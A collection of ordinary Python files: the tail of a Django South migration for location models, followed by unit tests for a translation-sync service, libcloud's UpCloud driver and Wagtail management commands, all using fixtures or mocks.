'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Region']", 'null': 'True', 'blank': 'True'})
},
'atlas.country': {
'Meta': {'ordering': "('name',)", 'object_name': 'Country'},
'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
'country_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'atlas.location': {
'Meta': {'object_name': 'Location'},
'address': ('django.db.models.fields.TextField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.City']"}),
'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'photo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['photologue.Photo']", 'null': 'True', 'blank': 'True'})
},
'atlas.region': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('country', 'code'),)", 'object_name': 'Region'},
'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
}
})
models['jmbo.modelbase']['location'] = ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Location']", 'null': 'True', 'blank': 'True'})
complete_apps = ['jmbo_calendar']
|
|
import json
from flask import request
from mock import patch
import appcomposer.translator.translation_listing as trlisting
from appcomposer import redis_store
from appcomposer.login import graasp_oauth_login_redirect
from appcomposer.tests.translator.fake_requests import create_requests_mock
from appcomposer.tests.utils import ComposerTest
from appcomposer.translator.tasks import synchronize_apps_no_cache_wrapper, task_synchronize_single_app, task_sync_repo_apps_all, task_download_repository_apps
from appcomposer.translator.mongodb_pusher import sync_mongodb_all, sync_mongodb_last_hour
from appcomposer.views.api import api_translate, bundle_update
from appcomposer.translator.mongodb_pusher import mongo_translation_urls, mongo_bundles, sync
class TranslatorTest(ComposerTest):
def setUp(self):
trlisting.DEBUG_VERBOSE = False
super(TranslatorTest, self).setUp()
mongo_translation_urls.remove()
mongo_bundles.remove()
redis_store.flushall()
def assertAppMongoDB(self, language, url, messages, messages_prefix = ''):
resultUrl = mongo_translation_urls.find_one({'_id':'{0}_ALL_ALL::http://{1}/languages/{2}en_ALL.xml'.format(language, url, messages_prefix)})
resultApp = mongo_bundles.find_one({'_id':'{0}_ALL_ALL::http://{1}/{2}gadget.xml'.format(language, url, messages_prefix)})
self.assertIsNotNone(resultUrl)
self.assertIsNotNone(resultApp)
self.assertEquals(resultUrl['data'], resultApp['data'])
data = json.loads(resultUrl['data'])
self.assertEqual(json.dumps(data), json.dumps(messages))
# self.assertDictEqual(data, messages)
def build_dict(self, identifier, number_of_messages, prefix, last = None, exceptions = None):
d = {}
for x in range(number_of_messages):
d['message{0}_{1}'.format(x + 1, identifier)] = "{0}{1}_{2}".format(prefix, x + 1, identifier)
if last:
d['message{0}_{1}'.format(number_of_messages, identifier)] = "{0}{1}_{2}".format(last, number_of_messages, identifier)
if exceptions:
for exception_key, exception_value in exceptions.items():
d[exception_key] = exception_value
return d
def assertMessages(self, messages, expected_messages):
for message_key, message_value in expected_messages.items():
message = messages[message_key]
if message_value['can_edit']:
self.assertTrue(messages[message_key]['can_edit'])
else:
self.assertFalse(messages[message_key]['can_edit'])
if message_value['from_default']:
self.assertTrue(messages[message_key]['from_default'])
else:
self.assertFalse(messages[message_key]['from_default'])
self.assertEqual(message_value['source'], message['source'])
self.assertEqual(message_value['target'], message['target'])
def assertApiTranslate(self, url, lang, automatic, preview, expected_messages = None, unexpected_messages = None):
request.args = {'app_url' : url}
# Check API
results = api_translate('{0}_ALL'.format(lang), 'ALL').json
self.assertIn('automatic', results)
if automatic:
self.assertTrue(results['automatic'])
else:
self.assertFalse(results['automatic'])
self.assertIn('preview', results)
if preview:
self.assertTrue(results['preview'])
else:
self.assertFalse(results['preview'])
self.assertEquals(results['url'], url)
self.assertMessages(results['translation'], expected_messages)
if unexpected_messages:
for unexpected_key in unexpected_messages:
self.assertNotIn(unexpected_key, results['translation'])
def assertApp1(self):
self.assertAppMongoDB("es", "url1", self.build_dict(1, 4, "Mensaje", "Message"))
# Check API
# self.assertApiTranslate('http://url1/gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message1_1': dict(can_edit=False, from_default=True, source='Message1_1', target='Message1_1'),
# })
# In Spanish, the fourth message is special
self.assertApiTranslate('http://url1/gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message1_1': dict(can_edit=False, from_default=False, source='Message1_1', target='Mensaje1_1'),
'message4_1': dict(can_edit=True, from_default=True, source='Message4_1', target='Message4_1'),
})
# There is no translation to French, so it's automatic
self.assertApiTranslate('http://url1/gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message1_1': dict(can_edit=True, from_default=False, source='Message1_1', target=None),
'message4_1': dict(can_edit=True, from_default=False, source='Message4_1', target=None),
})
def assertApp2(self):
self.assertAppMongoDB("es", "url2", self.build_dict(2, 4, "NonAutomaticMensaje", "NonAutomaticMessage"))
# Check API
# self.assertApiTranslate('http://url2/gadget.xml', lang = 'en', automatic = False, preview = False, expected_messages = {
# 'message1_2': dict(can_edit=False, from_default=True, source='NonAutomaticMessage1_2', target='NonAutomaticMessage1_2'),
# })
# In Spanish, the fourth message is special
self.assertApiTranslate('http://url2/gadget.xml', lang = 'es', automatic = False, preview = False, expected_messages = {
'message1_2': dict(can_edit=False, from_default=False, source='NonAutomaticMessage1_2', target='NonAutomaticMensaje1_2'),
'message4_2': dict(can_edit=True, from_default=True, source='NonAutomaticMessage4_2', target='NonAutomaticMessage4_2'),
})
# There is no translation to French, but it's still not automatic
self.assertApiTranslate('http://url2/gadget.xml', lang = 'fr', automatic = False, preview = False, expected_messages = {
'message1_2': dict(can_edit=True, from_default=False, source='NonAutomaticMessage1_2', target=None),
'message4_2': dict(can_edit=True, from_default=False, source='NonAutomaticMessage4_2', target=None),
})
def assertApp3before(self):
# url3 hosts 2 apps, with some shared terms.
# messages 1 and 2 are "common". message 3 is of a third tool. message 4 is of tool_. messages 5 and 6 are not of any tool (and therefore, they're of all)
# First we test the first app (tool_, so messages 4, 5 and 6 apply)
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'tool_')
# Check API
# self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message4_3': dict(can_edit=False, from_default=True, source='ToolIdMessage4_3', target='ToolIdMessage4_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# In Spanish, the sixth message is special
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message4_3': dict(can_edit=False, from_default=False, source='ToolIdMessage4_3', target='ToolIdMensaje4_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# There is no translation to French, so it's automatic
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message4_3': dict(can_edit=True, from_default=False, source='ToolIdMessage4_3', target=None),
'message5_3': dict(can_edit=True, from_default=False, source='ToolIdMessage5_3', target=None),
'message6_3': dict(can_edit=True, from_default=False, source='ToolIdMessage6_3', target=None),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
#
# Then we test the second one (common_, so messages 1, 2, 5 and 6 apply)
#
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'common_')
# self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message1_3': dict(can_edit=False, from_default=True, source='ToolIdMessage1_3', target='ToolIdMessage1_3'),
# 'message2_3': dict(can_edit=False, from_default=True, source='ToolIdMessage2_3', target='ToolIdMessage2_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message1_3': dict(can_edit=False, from_default=False, source='ToolIdMessage1_3', target='ToolIdMensaje1_3'),
'message2_3': dict(can_edit=False, from_default=False, source='ToolIdMessage2_3', target='ToolIdMensaje2_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message1_3': dict(can_edit=True, from_default=False, source='ToolIdMessage1_3', target=None),
'message2_3': dict(can_edit=True, from_default=False, source='ToolIdMessage2_3', target=None),
'message5_3': dict(can_edit=True, from_default=False, source='ToolIdMessage5_3', target=None),
'message6_3': dict(can_edit=True, from_default=False, source='ToolIdMessage6_3', target=None),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
def assertApp3after(self):
# url3 hosts 2 apps, with some shared terms.
# messages 1 and 2 are "common". message 3 is of a third tool. message 4 is of tool_. messages 5 and 6 are not of any tool (and therefore, they're of all)
# First we test the first app (tool_, so messages 4, 5 and 6 apply)
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'tool_')
self.assertAppMongoDB("fr", "url3", self.build_dict(3, 6, "ToolIdMessage", exceptions = {
"message1_3": "TESTING_MESSAGE1", # From commons
"message5_3": "TESTING_MESSAGE5", # From tools
}), 'tool_')
# Check API
# self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message4_3': dict(can_edit=False, from_default=True, source='ToolIdMessage4_3', target='ToolIdMessage4_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# In Spanish, the sixth message is special
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message4_3': dict(can_edit=False, from_default=False, source='ToolIdMessage4_3', target='ToolIdMensaje4_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
# There is no translation to French, so it's automatic
self.assertApiTranslate('http://url3/tool_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message4_3': dict(can_edit=True, from_default=True, source='ToolIdMessage4_3', target="ToolIdMessage4_3"),
'message5_3': dict(can_edit=True, from_default=False, source='ToolIdMessage5_3', target="TESTING_MESSAGE5"),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target="ToolIdMessage6_3"),
}, unexpected_messages = ('message1_3', 'message2_3', 'message3_3')) # unexpected: those in common or other tools
#
# Then we test the second one (common_, so messages 1, 2, 5 and 6 apply)
self.assertAppMongoDB("es", "url3", self.build_dict(3, 6, "ToolIdMensaje", "ToolIdMessage"), 'common_')
self.assertAppMongoDB("fr", "url3", self.build_dict(3, 6, "ToolIdMessage", exceptions = {
"message1_3": "TESTING_MESSAGE1", # From commons
}), 'common_')
# self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'en', automatic = False, preview = True, expected_messages = {
# 'message1_3': dict(can_edit=False, from_default=True, source='ToolIdMessage1_3', target='ToolIdMessage1_3'),
# 'message2_3': dict(can_edit=False, from_default=True, source='ToolIdMessage2_3', target='ToolIdMessage2_3'),
# 'message5_3': dict(can_edit=False, from_default=True, source='ToolIdMessage5_3', target='ToolIdMessage5_3'),
# 'message6_3': dict(can_edit=False, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
# }, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'es', automatic = False, preview = True, expected_messages = {
'message1_3': dict(can_edit=False, from_default=False, source='ToolIdMessage1_3', target='ToolIdMensaje1_3'),
'message2_3': dict(can_edit=False, from_default=False, source='ToolIdMessage2_3', target='ToolIdMensaje2_3'),
'message5_3': dict(can_edit=False, from_default=False, source='ToolIdMessage5_3', target='ToolIdMensaje5_3'),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target='ToolIdMessage6_3'),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
self.assertApiTranslate('http://url3/common_gadget.xml', lang = 'fr', automatic = True, preview = True, expected_messages = {
'message1_3': dict(can_edit=True, from_default=False, source='ToolIdMessage1_3', target="TESTING_MESSAGE1"),
'message2_3': dict(can_edit=True, from_default=True, source='ToolIdMessage2_3', target="ToolIdMessage2_3"),
'message5_3': dict(can_edit=True, from_default=True, source='ToolIdMessage5_3', target="ToolIdMessage5_3"),
'message6_3': dict(can_edit=True, from_default=True, source='ToolIdMessage6_3', target="ToolIdMessage6_3"),
}, unexpected_messages = ('message3_3', 'message4_3')) # unexpected: those in common or other tools
def assertGraaspApp(self):
resultEngUrl = mongo_translation_urls.find_one({'_id':'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/languages/en_ALL.xml'})
resultEngApp = mongo_bundles.find_one({'_id':'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/'})
self.assertEquals(resultEngUrl['data'], resultEngApp['data'])
data = json.loads(resultEngUrl['data'])
self.assertEquals("Mensaje1_1", data['message1_1'])
self.assertEquals("Mensaje2_1", data['message2_1'])
self.assertEquals("Mensaje3_1", data['message3_1'])
self.assertEquals("Message4_1", data['message4_1'])
def assertGraaspAppNotFound(self):
resultEngUrl = mongo_translation_urls.find_one({'_id':'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/languages/en_ALL.xml'})
self.assertIsNone(resultEngUrl)
resultEngApp = mongo_bundles.find_one({'_id':'es_ALL_ALL::http://composer.golabz.eu/graasp_i18n/'})
self.assertIsNone(resultEngApp)
def assertApps(self, before = True):
self.assertApp1()
self.assertApp2()
if before:
self.assertApp3before()
else:
self.assertApp3after()
class TestSync(TranslatorTest):
@patch("appcomposer.translator.utils.get_cached_session")
@patch("requests.Session")
def test_sync(self, mock_requests, mock_requests_cached_session):
mock_requests().get = create_requests_mock()
mock_requests_cached_session().get = create_requests_mock()
graasp_oauth_login_redirect()
synchronize_apps_no_cache_wrapper("testing")
sync_mongodb_all(None)
self.assertApps()
self.assertGraaspApp()
synchronize_apps_no_cache_wrapper("testing")
sync_mongodb_all(None)
self.assertApps(before = True)
self.assertGraaspApp()
# Add to commons one term which should be applied to tools too.
request._cached_json = request.values = {
'app_url': "http://url3/common_gadget.xml",
'key': 'message1_3',
'value': 'TESTING_MESSAGE1',
}
bundle_update('fr_ALL', 'ALL')
# Add to tool_ one term which should not be applied to common.
request._cached_json = request.values = {
'app_url': "http://url3/tool_gadget.xml",
'key': 'message5_3',
'value': 'TESTING_MESSAGE5',
}
bundle_update('fr_ALL', 'ALL')
sync(None, only_recent = True)
sync_mongodb_all(None)
self.assertApps(before = False)
self.assertGraaspApp()
@patch("appcomposer.translator.utils.get_cached_session")
@patch("requests.Session")
def test_sync_single_url(self, mock_requests, mock_requests_cached_session):
mock_requests().get = create_requests_mock()
mock_requests_cached_session().get = create_requests_mock()
graasp_oauth_login_redirect()
task_sync_repo_apps_all()
task_download_repository_apps()
task_synchronize_single_app("testing", 'http://url1/gadget.xml')
sync_mongodb_last_hour(None)
self.assertApp1()
self.assertGraaspAppNotFound()
task_synchronize_single_app("testing", 'http://composer.golabz.eu/graasp_i18n/')
sync_mongodb_last_hour(None)
self.assertGraaspApp()
@patch("appcomposer.translator.utils.get_cached_session")
def test_sync2(self, mock):
mock().get = create_requests_mock()
synchronize_apps_no_cache_wrapper("testing")
sync_mongodb_all(None)
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
from mock import Mock, call
from libcloud.common.upcloud import UpcloudCreateNodeRequestBody, UpcloudNodeDestroyer, UpcloudNodeOperations
from libcloud.common.upcloud import _StorageDevice
from libcloud.common.upcloud import UpcloudTimeoutException
from libcloud.common.upcloud import PlanPrice
from libcloud.compute.base import NodeImage, NodeSize, NodeLocation, NodeAuthSSHKey
from libcloud.test import unittest
class TestUpcloudCreateNodeRequestBody(unittest.TestCase):
def setUp(self):
self.image = NodeImage(id='01000000-0000-4000-8000-000030060200',
name='Ubuntu Server 16.04 LTS (Xenial Xerus)',
driver='',
extra={'type': 'template'})
self.location = NodeLocation(id='fi-hel1', name='Helsinki #1', country='FI', driver='')
self.size = NodeSize(id='1xCPU-1GB', name='1xCPU-1GB', ram=1024, disk=30, bandwidth=2048,
extra={'core_number': 1, 'storage_tier': 'maxiops'}, price=None, driver='')
def test_creating_node_from_template_image(self):
body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size)
json_body = body.to_json()
dict_body = json.loads(json_body)
expected_body = {
'server': {
'title': 'ts',
'hostname': 'localhost',
'plan': '1xCPU-1GB',
'zone': 'fi-hel1',
'login_user': {'username': 'root',
'create_password': 'yes'},
'storage_devices': {
'storage_device': [{
'action': 'clone',
'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
'storage': '01000000-0000-4000-8000-000030060200',
'size': 30,
'tier': 'maxiops',
}]
},
}
}
self.assertDictEqual(expected_body, dict_body)
def test_creating_node_from_cdrom_image(self):
image = NodeImage(id='01000000-0000-4000-8000-000030060200',
name='Ubuntu Server 16.04 LTS (Xenial Xerus)',
driver='',
extra={'type': 'cdrom'})
body = UpcloudCreateNodeRequestBody(name='ts', image=image, location=self.location, size=self.size)
json_body = body.to_json()
dict_body = json.loads(json_body)
expected_body = {
'server': {
'title': 'ts',
'hostname': 'localhost',
'plan': '1xCPU-1GB',
'zone': 'fi-hel1',
'login_user': {'username': 'root',
'create_password': 'yes'},
'storage_devices': {
'storage_device': [
{
'action': 'create',
'size': 30,
'tier': 'maxiops',
'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
},
{
'action': 'attach',
'storage': '01000000-0000-4000-8000-000030060200',
'type': 'cdrom'
}
]
}
}
}
self.assertDictEqual(expected_body, dict_body)
def test_creating_node_using_ssh_keys(self):
auth = NodeAuthSSHKey('sshkey')
body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size, auth=auth)
json_body = body.to_json()
dict_body = json.loads(json_body)
expected_body = {
'server': {
'title': 'ts',
'hostname': 'localhost',
'plan': '1xCPU-1GB',
'zone': 'fi-hel1',
'login_user': {
'username': 'root',
'ssh_keys': {
'ssh_key': [
'sshkey'
]
},
},
'storage_devices': {
'storage_device': [{
'action': 'clone',
'size': 30,
'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
'tier': 'maxiops',
'storage': '01000000-0000-4000-8000-000030060200'
}]
},
}
}
self.assertDictEqual(expected_body, dict_body)
def test_creating_node_using_hostname(self):
body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size,
ex_hostname='myhost.upcloud.com')
json_body = body.to_json()
dict_body = json.loads(json_body)
expected_body = {
'server': {
'title': 'ts',
'hostname': 'myhost.upcloud.com',
'plan': '1xCPU-1GB',
'zone': 'fi-hel1',
'login_user': {'username': 'root',
'create_password': 'yes'},
'storage_devices': {
'storage_device': [{
'action': 'clone',
'title': 'Ubuntu Server 16.04 LTS (Xenial Xerus)',
'storage': '01000000-0000-4000-8000-000030060200',
'tier': 'maxiops',
'size': 30
}]
},
}
}
self.assertDictEqual(expected_body, dict_body)
def test_creating_node_with_non_default_username(self):
body = UpcloudCreateNodeRequestBody(name='ts', image=self.image, location=self.location, size=self.size,
ex_username='someone')
json_body = body.to_json()
dict_body = json.loads(json_body)
login_user = dict_body['server']['login_user']
self.assertDictEqual({'username': 'someone', 'create_password': 'yes'}, login_user)
class TestStorageDevice(unittest.TestCase):
def setUp(self):
self.image = NodeImage(id='01000000-0000-4000-8000-000030060200',
name='Ubuntu Server 16.04 LTS (Xenial Xerus)',
driver='',
extra={'type': 'template'})
self.size = NodeSize(id='1xCPU-1GB', name='1xCPU-1GB', ram=1024, disk=30, bandwidth=2048,
extra={'core_number': 1}, price=None, driver='')
def test_storage_tier_default_value(self):
storagedevice = _StorageDevice(self.image, self.size)
d = storagedevice.to_dict()
self.assertEqual(d['storage_device'][0]['tier'], 'maxiops')
def test_storage_tier_given(self):
self.size.extra['storage_tier'] = 'hdd'
storagedevice = _StorageDevice(self.image, self.size)
d = storagedevice.to_dict()
self.assertEqual(d['storage_device'][0]['tier'], 'hdd')
class TestUpcloudNodeDestroyer(unittest.TestCase):
def setUp(self):
self.mock_sleep = Mock()
self.mock_operations = Mock(spec=UpcloudNodeOperations)
self.destroyer = UpcloudNodeDestroyer(self.mock_operations, sleep_func=self.mock_sleep)
def test_node_already_in_stopped_state(self):
self.mock_operations.get_node_state.side_effect = ['stopped']
self.assertTrue(self.destroyer.destroy_node(1))
self.assertTrue(self.mock_operations.stop_node.call_count == 0)
self.mock_operations.destroy_node.assert_called_once_with(1)
def test_node_in_error_state(self):
self.mock_operations.get_node_state.side_effect = ['error']
self.assertFalse(self.destroyer.destroy_node(1))
self.assertTrue(self.mock_operations.stop_node.call_count == 0)
self.assertTrue(self.mock_operations.destroy_node.call_count == 0)
def test_node_in_started_state(self):
self.mock_operations.get_node_state.side_effect = ['started', 'stopped']
self.assertTrue(self.destroyer.destroy_node(1))
self.mock_operations.stop_node.assert_called_once_with(1)
self.mock_operations.destroy_node.assert_called_once_with(1)
def test_node_in_maintenace_state(self):
self.mock_operations.get_node_state.side_effect = ['maintenance', 'maintenance', None]
self.assertTrue(self.destroyer.destroy_node(1))
self.mock_sleep.assert_has_calls([call(self.destroyer.WAIT_AMOUNT), call(self.destroyer.WAIT_AMOUNT)])
self.assertTrue(self.mock_operations.stop_node.call_count == 0)
self.assertTrue(self.mock_operations.destroy_node.call_count == 0)
def test_node_statys_in_started_state_for_awhile(self):
self.mock_operations.get_node_state.side_effect = ['started', 'started', 'stopped']
self.assertTrue(self.destroyer.destroy_node(1))
# Only one all for stop should be done
self.mock_operations.stop_node.assert_called_once_with(1)
self.mock_sleep.assert_has_calls([call(self.destroyer.WAIT_AMOUNT)])
self.mock_operations.destroy_node.assert_called_once_with(1)
def test_reuse(self):
"""Verify that internal flag self.destroyer._stop_node is handled properly"""
self.mock_operations.get_node_state.side_effect = ['started', 'stopped', 'started', 'stopped']
self.assertTrue(self.destroyer.destroy_node(1))
self.assertTrue(self.destroyer.destroy_node(1))
self.assertEqual(self.mock_sleep.call_count, 0)
self.assertEqual(self.mock_operations.stop_node.call_count, 2)
def test_timeout(self):
self.mock_operations.get_node_state.side_effect = ['maintenance'] * 50
self.assertRaises(UpcloudTimeoutException, self.destroyer.destroy_node, 1)
def test_timeout_reuse(self):
"""Verify sleep count is handled properly"""
self.mock_operations.get_node_state.side_effect = ['maintenance'] * 50
self.assertRaises(UpcloudTimeoutException, self.destroyer.destroy_node, 1)
self.mock_operations.get_node_state.side_effect = ['maintenance', None]
self.assertTrue(self.destroyer.destroy_node(1))
class TestPlanPrice(unittest.TestCase):
def setUp(self):
prices = [{'name': 'uk-lon1', 'server_plan_1xCPU-1GB': {'amount': 1, 'price': 1.488}},
{'name': 'fi-hel1', 'server_plan_1xCPU-1GB': {'amount': 1, 'price': 1.588}}]
self.pp = PlanPrice(prices)
def test_zone_prices(self):
location = NodeLocation(id='fi-hel1', name='Helsinki #1', country='FI', driver=None)
self.assertEqual(self.pp.get_price('1xCPU-1GB', location), 1.588)
def test_plan_not_found_in_zone(self):
location = NodeLocation(id='no_such_location', name='', country='', driver=None)
self.assertIsNone(self.pp.get_price('1xCPU-1GB', location))
def test_no_location_given(self):
self.assertIsNone(self.pp.get_price('1xCPU-1GB'))
if __name__ == '__main__':
sys.exit(unittest.main())
|
|
from datetime import timedelta
from six import StringIO
from django.test import TestCase
from django.core import management
from django.utils import timezone
from wagtail.wagtailcore.models import Page, PageRevision
from wagtail.wagtailcore.signals import page_published, page_unpublished
from wagtail.tests.models import SimplePage
class TestFixTreeCommand(TestCase):
fixtures = ['test.json']
def run_command(self):
management.call_command('fixtree', interactive=False, stdout=StringIO())
def test_fixes_numchild(self):
# Get homepage and save old value
homepage = Page.objects.get(url_path='/home/')
old_numchild = homepage.numchild
# Break it
homepage.numchild = 12345
homepage.save()
# Check that its broken
self.assertEqual(Page.objects.get(url_path='/home/').numchild, 12345)
# Call command
self.run_command()
# Check if its fixed
self.assertEqual(Page.objects.get(url_path='/home/').numchild, old_numchild)
def test_fixes_depth(self):
# Get homepage and save old value
homepage = Page.objects.get(url_path='/home/')
old_depth = homepage.depth
# Break it
homepage.depth = 12345
homepage.save()
# Check that its broken
self.assertEqual(Page.objects.get(url_path='/home/').depth, 12345)
# Call command
self.run_command()
# Check if its fixed
self.assertEqual(Page.objects.get(url_path='/home/').depth, old_depth)
class TestMovePagesCommand(TestCase):
fixtures = ['test.json']
def run_command(self, from_, to):
management.call_command('move_pages', str(from_), str(to), interactive=False, stdout=StringIO())
def test_move_pages(self):
# Get pages
events_index = Page.objects.get(url_path='/home/events/')
about_us = Page.objects.get(url_path='/home/about-us/')
page_ids = events_index.get_children().values_list('id', flat=True)
# Move all events into "about us"
self.run_command(events_index.id, about_us.id)
# Check that all pages moved
for page_id in page_ids:
self.assertEqual(Page.objects.get(id=page_id).get_parent(), about_us)
class TestReplaceTextCommand(TestCase):
fixtures = ['test.json']
def run_command(self, from_text, to_text):
management.call_command('replace_text', from_text, to_text, interactive=False, stdout=StringIO())
def test_replace_text(self):
# Check that the christmas page is definitely about christmas
self.assertEqual(Page.objects.get(url_path='/home/events/christmas/').title, "Christmas")
# Make it about easter
self.run_command("Christmas", "Easter")
# Check that its now about easter
self.assertEqual(Page.objects.get(url_path='/home/events/christmas/').title, "Easter")
class TestPublishScheduledPagesCommand(TestCase):
def setUp(self):
# Find root page
self.root_page = Page.objects.get(id=2)
def test_go_live_page_will_be_published(self):
# Connect a mock signal handler to page_published signal
signal_fired = [False]
signal_page = [None]
def page_published_handler(sender, instance, **kwargs):
signal_fired[0] = True
signal_page[0] = instance
page_published.connect(page_published_handler)
page = SimplePage(
title="Hello world!",
slug="hello-world",
live=False,
go_live_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertFalse(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
# Check that the page_published signal was fired
self.assertTrue(signal_fired[0])
self.assertEqual(signal_page[0], page)
self.assertEqual(signal_page[0], signal_page[0].specific)
def test_future_go_live_page_will_not_be_published(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
live=False,
go_live_at=timezone.now() + timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(approved_go_live_at=timezone.now() - timedelta(days=1))
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
